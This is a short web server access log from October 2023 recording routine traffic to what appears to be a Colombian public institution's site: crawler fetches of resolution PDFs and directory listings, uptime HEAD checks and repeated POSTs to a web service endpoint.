172.22.2.4 - - [14/Oct/2023:04:05:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:04:06:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
114.119.135.254 - - [14/Oct/2023:04:08:03 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2202/&sort=name&order=desc HTTP/1.1" 200 13943
172.22.2.4 - - [14/Oct/2023:04:06:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53845
201.245.192.253 - - [14/Oct/2023:04:08:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
123.126.50.169 - - [14/Oct/2023:04:09:00 -0500] "GET / HTTP/1.1" 200 319
66.249.66.19 - - [14/Oct/2023:04:09:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1597.pdf HTTP/1.1" 200 84449
114.119.150.154 - - [14/Oct/2023:04:09:44 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2022/&sort=size&order=asc HTTP/1.1" 200 13944
52.167.144.171 - - [14/Oct/2023:04:10:06 -0500] "GET /caminatas-ecologicas-un-plan-imperdible-para-octubre.html HTTP/1.1" 200 747
216.245.221.92 - - [14/Oct/2023:04:11:01 -0500] "HEAD / HTTP/1.1" 200 -
114.119.157.166 - - [14/Oct/2023:04:11:29 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2018/ HTTP/1.1" 200 13882
114.119.129.179 - - [14/Oct/2023:04:12:12 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2015/ HTTP/1.1" 200 13882
101.67.49.21 - - [14/Oct/2023:04:12:54 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Oct/2023:04:11:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2023:04:13:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:04:12:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57802
114.119.157.196 - - [14/Oct/2023:04:13:55 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2013/&sort=size&order=asc HTTP/1.1" 200 13882
216.245.221.92 - - [14/Oct/2023:04:16:01 -0500] "HEAD / HTTP/1.1" 200 -
101.67.49.169 - - [14/Oct/2023:04:16:10 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [14/Oct/2023:04:17:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42730
201.245.192.253 - - [14/Oct/2023:04:18:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39471
201.245.192.253 - - [14/Oct/2023:04:18:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:04:17:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:04:18:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58155
168.119.253.11 - - [14/Oct/2023:04:20:52 -0500] "GET / HTTP/1.1" 200 319
168.119.253.11 - - [14/Oct/2023:04:20:52 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [14/Oct/2023:04:21:01 -0500] "HEAD / HTTP/1.1" 200 -
114.119.153.15 - - [14/Oct/2023:04:21:23 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/RESOLUCIONES%2B2023/&sort=size&order=asc HTTP/1.1" 200 13965
52.167.144.20 - - [14/Oct/2023:04:22:41 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
201.245.192.253 - - [14/Oct/2023:04:23:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:04:23:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
69.63.189.120 - - [14/Oct/2023:04:25:11 -0500] "GET /images/plantacion-humedal-la-conejera.jpg HTTP/1.1" 200 92644
172.22.2.4 - - [14/Oct/2023:04:23:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58155
216.245.221.92 - - [14/Oct/2023:04:26:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2023:04:27:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42730
201.245.192.253 - - [14/Oct/2023:04:28:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39471
201.245.192.253 - - [14/Oct/2023:04:28:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
66.249.66.20 - - [14/Oct/2023:04:29:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/2955.pdf HTTP/1.1" 200 271184
172.22.2.4 - - [14/Oct/2023:04:28:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Oct/2023:04:31:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:04:29:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58155
201.245.192.253 - - [14/Oct/2023:04:33:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
101.91.148.219 - - [14/Oct/2023:04:34:10 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [14/Oct/2023:04:36:01 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.20 - - [14/Oct/2023:04:36:09 -0500] "GET /BLA/resoluciones/AUTOS%202014/0441.pdf HTTP/1.1" 200 357658
